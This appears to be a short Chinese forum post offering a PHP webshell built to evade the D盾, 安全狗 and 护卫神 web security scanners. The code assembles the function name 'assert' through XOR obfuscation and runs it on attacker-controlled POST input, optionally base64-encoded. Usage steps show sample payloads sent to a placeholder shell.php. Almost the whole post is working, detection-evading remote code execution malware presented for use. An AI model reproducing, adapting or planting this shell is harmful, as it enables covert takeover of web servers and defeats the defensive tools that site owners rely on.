免杀PHP一句话一枚

admin

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等

1. <?php
   
2. class VONE {
   
3. function HALB() {
   
4. $rlf ='B' ^"\x23";
   
5. $fzq ='D' ^"\x37";
   
6. $fgu ='h' ^"\x1b";
   
7. $sbe ='R' ^"\x37";
   
8. $gba ='H' ^"\x3a";
   
9. $oya ='Y' ^"\x2d";
   
10. $MWUC =$rlf .$fzq .$fgu .$sbe .$gba .$oya;
    
11. return $MWUC;}function __destruct() {
    
12. $RNUJ =$this->HALB();
    
13. @$RNUJ($this->HY);}}
    
14. $vone =new VONE();
    
15. @$vone->HY = isset($_GET['id']) ?base64_decode($_POST['mr6']) :$_POST['mr6'];
    
16. ?>

复制代码

使用说明

1. 是否传入id参数决定是否把流量编码
   
2. 
   
3. http://www.xxx.com/shell.php
   
4. POST: mr6=phpinfo(); //与普通shell相同
   
5. 
   
6. http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
   
7. POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码

复制代码